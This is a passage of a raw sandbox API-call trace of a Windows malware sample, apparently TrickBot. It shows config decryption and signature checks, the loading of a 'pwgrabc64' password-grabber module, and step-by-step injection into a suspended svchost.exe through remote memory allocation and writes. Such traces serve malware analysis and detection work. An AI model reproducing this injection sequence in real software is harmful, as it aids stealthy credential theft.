[0184.077] CryptSetKeyParam (hKey=0x3396ecc0, dwParam=0x1, pbData=0x32e84ff0, dwFlags=0x0) returned 1 [0184.085] CryptDecrypt (in: hKey=0x3396ecc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3224c720, pdwDataLen=0xce01c | out: pbData=0x3224c720, pdwDataLen=0xce01c) returned 1 [0184.085] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0184.085] CryptDestroyKey (hKey=0x3396ecc0) returned 0 [0184.085] GetVersion () returned 0x295a000a [0184.087] BCryptOpenAlgorithmProvider (in: phAlgorithm=0xcdf88, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0xcdf88) returned 0x0 [0184.087] BCryptImportKeyPair (in: hAlgorithm=0x33997f30, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0xcdf80, pbInput=0x32e40d90, cbInput=0x68, dwFlags=0x0 | out: phKey=0xcdf80) returned 0x0 [0184.088] BCryptGetProperty (in: hObject=0x337b4910, pszProperty="SignatureLength", pbOutput=0xcdf7c, cbOutput=0x4, pcbResult=0xcdf9c, dwFlags=0x0 | out: pbOutput=0xcdf7c, pcbResult=0xcdf9c) returned 0x0 [0184.088] BCryptVerifySignature (hKey=0x337b4910, pPaddingInfo=0x0, pbHash=0x32e77920, cbHash=0x30, pbSignature=0x322c9bf0, cbSignature=0x60, dwFlags=0x0) returned 0x0 [0184.088] BCryptDestroyKey (in: hKey=0x337b4910 | out: hKey=0x337b4910) returned 0x0 [0184.088] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x33997f30, dwFlags=0x0 | out: hAlgorithm=0x33997f30) returned 0x0 [0184.089] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77920 | out: hHeap=0x2150000) returned 1 [0184.115] lstrlenA (lpString="*") returned 30 [0184.116] CharLowerBuffA (in: lpsz="moduleconfig", cchLength=0xc | out: lpsz="moduleconfig") returned 0xc [0184.116] CharLowerBuffA (in: lpsz="autostart", cchLength=0x9 | out: lpsz="autostart") returned 0x9 [0184.116] CharLowerBuffA (in: lpsz="all", cchLength=0x3 | out: lpsz="all") returned 0x3 [0184.117] CharLowerBuffA (in: lpsz="nohead", cchLength=0x6 | out: lpsz="nohead") returned 0x6 [0184.117] CharLowerBuffA (in: lpsz="needinfo", cchLength=0x8 | out: lpsz="needinfo") returned 0x8 [0184.117] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4 [0184.117] CharLowerBuffA (in: lpsz="needinfo", cchLength=0x8 | out: lpsz="needinfo") returned 0x8 [0184.117] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4 [0184.117] CharLowerBuffA (in: lpsz="autoconf", cchLength=0x8 | out: lpsz="autoconf") returned 0x8 [0184.117] CharLowerBuffA (in: lpsz="conf", cchLength=0x4 | out: lpsz="conf") returned 0x4 [0184.117] CharLowerBuffA (in: lpsz="ctl", cchLength=0x3 | out: lpsz="ctl") returned 0x3 [0184.117] CharLowerBuffA (in: lpsz="file", cchLength=0x4 | out: lpsz="file") returned 0x4 [0184.117] CharLowerBuffA (in: lpsz="period", cchLength=0x6 | out: lpsz="period") returned 0x6 [0184.117] CharLowerBuffA (in: lpsz="id", cchLength=0x2 | out: lpsz="id") returned 0x2 [0184.117] CharLowerBuffA (in: lpsz="ip", cchLength=0x2 | out: lpsz="ip") returned 0x2 [0184.118] GetFullPathNameW (in: lpFileName="EN\\pwgrabc64", nBufferLength=0x105, lpBuffer=0x32e65610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\EN\\pwgrabc64", lpFilePart=0x0) returned 0x20 [0184.118] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ac5770 | out: hHeap=0x2150000) returned 1 [0184.124] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65610 | out: hHeap=0x2150000) returned 1 [0184.124] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e4ffd0 | out: hHeap=0x2150000) returned 1 [0184.124] WinHttpCloseHandle (hInternet=0x332b3920) returned 1 [0184.124] WinHttpCloseHandle (hInternet=0x332be850) returned 1 [0184.124] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6f4e0 | out: hHeap=0x2150000) returned 1 [0184.124] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fde0 | out: hHeap=0x2150000) returned 1 [0184.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="pwgrabc64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0184.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="pwgrabc64", cchWideChar=-1, lpMultiByteStr=0x32e80c50, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pwgrabc64", lpUsedDefaultChar=0x0) returned 10 [0184.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tot153", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0184.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tot153", cchWideChar=-1, lpMultiByteStr=0x32e80e90, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tot153", lpUsedDefaultChar=0x0) returned 7 [0184.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0184.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93", cchWideChar=-1, lpMultiByteStr=0x3204ea90, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93", lpUsedDefaultChar=0x0) returned 50 [0184.125] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xce1b8 | out: lpSystemTimeAsFileTime=0xce1b8*(dwLowDateTime=0xfa42c6ec, dwHighDateTime=0x1d7b3c9)) [0184.125] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84cf0 [0184.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="88.153.199.169", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0184.125] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e80a90 [0184.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="88.153.199.169", cchWideChar=-1, lpMultiByteStr=0x32e80a90, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="88.153.199.169", lpUsedDefaultChar=0x0) returned 15 [0184.125] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80e90 | out: hHeap=0x2150000) returned 1 [0184.125] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3204ea90 | out: hHeap=0x2150000) returned 1 [0184.125] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80a90 | out: hHeap=0x2150000) returned 1 [0184.125] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84cf0 | out: hHeap=0x2150000) returned 1 [0184.125] GetStartupInfoW (in: lpStartupInfo=0xcdd28 | out: lpStartupInfo=0xcdd28*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0184.125] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x800) returned 0x322c9010 [0184.125] GetSystemDirectoryW (in: lpBuffer=0x322c9010, uSize=0x400 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0184.125] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\svchost.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xcdd28*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0), lpProcessInformation=0xcdd90 | out: lpCommandLine="C:\\Windows\\system32\\svchost.exe", lpProcessInformation=0xcdd90*(hProcess=0x6f4, hThread=0x6f8, dwProcessId=0x57c, dwThreadId=0xfac)) returned 1 [0184.134] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x322c9010 | out: hHeap=0x2150000) returned 1 [0184.134] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x794 [0184.134] GetCurrentProcess () returned 0xffffffffffffffff [0184.134] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x790 [0184.134] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7a8 [0184.134] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x794, hTargetProcessHandle=0x6f4, lpTargetHandle=0xcdb10, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xcdb10*=0x4) returned 1 [0184.134] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x7a8, hTargetProcessHandle=0x6f4, lpTargetHandle=0xcdb18, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xcdb18*=0x8) returned 1 [0184.135] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x790, hTargetProcessHandle=0x6f4, lpTargetHandle=0xcdb20, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xcdb20*=0xc) returned 1 [0184.135] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x230, flAllocationType=0x3000, flProtect=0x40) returned 0x100000 [0184.135] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x100000, lpBuffer=0x121a90*, nSize=0x230, lpNumberOfBytesWritten=0xcdab8 | out: lpBuffer=0x121a90*, lpNumberOfBytesWritten=0xcdab8*=0x230) returned 1 [0184.136] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.136] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WaitForSingleObject") returned 0x7ffb2625d840 [0184.136] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CloseHandle") returned 0x7ffb2625d650 [0184.136] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SignalObjectAndWait") returned 0x7ffb2625d070 [0184.136] GetProcAddress (hModule=0x7ffb26230000, lpProcName="ExitProcess") returned 0x7ffb26254d80 [0184.137] GetProcAddress (hModule=0x7ffb26230000, lpProcName="ResetEvent") returned 0x7ffb2625d7e0 [0184.137] GetProcAddress (hModule=0x7ffb26230000, lpProcName="InitializeCriticalSection") returned 0x7ffb28b6ced0 [0184.137] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LeaveCriticalSection") returned 0x7ffb28b2eb00 [0184.137] GetProcAddress (hModule=0x7ffb26230000, lpProcName="EnterCriticalSection") returned 0x7ffb28b2e600 [0184.137] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xd8, flAllocationType=0x3000, flProtect=0x40) returned 0x110000 [0184.137] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcdb10*, nSize=0xd8, lpNumberOfBytesWritten=0xcdab8 | out: lpBuffer=0xcdb10*, lpNumberOfBytesWritten=0xcdab8*=0xd8) returned 1 [0184.138] NtQueryInformationProcess (in: ProcessHandle=0x6f4, ProcessInformationClass=0x0, ProcessInformation=0xcd940, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xcd940, ReturnLength=0x0) returned 0x0 [0184.138] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x3d9000, lpBuffer=0xcd920, nSize=0x20, lpNumberOfBytesRead=0xcd8d8 | out: lpBuffer=0xcd920*, lpNumberOfBytesRead=0xcd8d8*=0x20) returned 1 [0184.138] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x7ff6bac60000, lpBuffer=0xcd970, nSize=0x40, lpNumberOfBytesRead=0xcd8d8 | out: lpBuffer=0xcd970*, lpNumberOfBytesRead=0xcd8d8*=0x40) returned 1 [0184.138] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x7ff6bac600f0, lpBuffer=0xcd9b0, nSize=0x108, lpNumberOfBytesRead=0xcd8d8 | out: lpBuffer=0xcd9b0*, lpNumberOfBytesRead=0xcd8d8*=0x108) returned 1 [0184.138] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x7ff6bac63980, lpBuffer=0xcdd18*, nSize=0x16, lpNumberOfBytesWritten=0xcdab8 | out: lpBuffer=0xcdd18*, lpNumberOfBytesWritten=0xcdab8*=0x16) returned 1 [0184.139] ResetEvent (hEvent=0x794) returned 1 [0184.139] ResetEvent (hEvent=0x7a8) returned 1 [0184.139] ResumeThread (hThread=0x6f8) returned 0x1 [0184.139] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.167] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x7d4d0) returned 0x32ac5770 [0184.174] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x180000000, dwSize=0x82000, flAllocationType=0x2000, flProtect=0x40) returned 0x180000000 [0184.175] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x180000000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x180000000 [0184.230] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.230] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryW") returned 0x7ffb262550f0 [0184.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32b3d4b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0184.230] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85260 [0184.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32b3d4b0, cbMultiByte=-1, lpWideCharStr=0x32e85260, cchWideChar=13 | out: lpWideCharStr="KERNEL32.dll") returned 13 [0184.230] lstrlenW (lpString="KERNEL32.dll") returned 12 [0184.230] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.230] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32e85260*, nSize=0x1a, lpNumberOfBytesWritten=0xcd988 | out: lpBuffer=0x32e85260*, lpNumberOfBytesWritten=0xcd988*=0x1a) returned 1 [0184.231] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8e0, nSize=0xd8, lpNumberOfBytesRead=0xcd898 | out: lpBuffer=0xcd8e0*, lpNumberOfBytesRead=0xcd898*=0xd8) returned 1 [0184.231] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84a20 [0184.231] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.231] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84a20*, nSize=0x18, lpNumberOfBytesWritten=0xcd898 | out: lpBuffer=0x32e84a20*, lpNumberOfBytesWritten=0xcd898*=0x18) returned 1 [0184.231] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8e0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd898 | out: lpBuffer=0xcd8e0*, lpNumberOfBytesWritten=0xcd898*=0xd8) returned 1 [0184.232] ResetEvent (hEvent=0x794) returned 1 [0184.232] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.232] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8e0, nSize=0xd8, lpNumberOfBytesRead=0xcd898 | out: lpBuffer=0xcd8e0*, lpNumberOfBytesRead=0xcd898*=0xd8) returned 1 [0184.232] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.232] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84a20 | out: hHeap=0x2150000) returned 1 [0184.232] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.232] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e85260 | out: hHeap=0x2150000) returned 1 [0184.233] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.233] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.238] lstrlenA (lpString="GetLastError") returned 12 [0184.238] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.239] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d39e*, nSize=0xd, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d39e*, lpNumberOfBytesWritten=0xcd978*=0xd) returned 1 [0184.239] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.239] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85260 [0184.239] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.239] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e85260*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e85260*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.240] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.240] ResetEvent (hEvent=0x794) returned 1 [0184.240] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.241] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.241] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.241] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e85260 | out: hHeap=0x2150000) returned 1 [0184.241] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.241] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.241] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.241] lstrlenA (lpString="HeapFree") returned 8 [0184.241] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.242] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d3ae*, nSize=0x9, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d3ae*, lpNumberOfBytesWritten=0xcd978*=0x9) returned 1 [0184.242] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.242] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84e70 [0184.242] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.242] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84e70*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84e70*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.243] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.243] ResetEvent (hEvent=0x794) returned 1 [0184.243] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.244] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.244] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.244] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84e70 | out: hHeap=0x2150000) returned 1 [0184.244] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.244] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.244] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.244] lstrlenA (lpString="HeapSize") returned 8 [0184.244] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.245] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d3ba*, nSize=0x9, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d3ba*, lpNumberOfBytesWritten=0xcd978*=0x9) returned 1 [0184.245] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.245] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85020 [0184.245] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.245] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e85020*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e85020*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.246] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.246] ResetEvent (hEvent=0x794) returned 1 [0184.246] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.246] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.246] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.246] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e85020 | out: hHeap=0x2150000) returned 1 [0184.246] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.247] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.247] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.247] lstrlenA (lpString="HeapReAlloc") returned 11 [0184.247] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.247] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d3c6*, nSize=0xc, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d3c6*, lpNumberOfBytesWritten=0xcd978*=0xc) returned 1 [0184.248] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.248] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e847e0 [0184.248] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.248] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e847e0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e847e0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.248] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.249] ResetEvent (hEvent=0x794) returned 1 [0184.249] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.249] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.249] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.249] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e847e0 | out: hHeap=0x2150000) returned 1 [0184.249] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.250] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.250] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.250] lstrlenA (lpString="HeapAlloc") returned 9 [0184.250] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.250] WriteProcessMemory (in: hProcess=0x6f4, 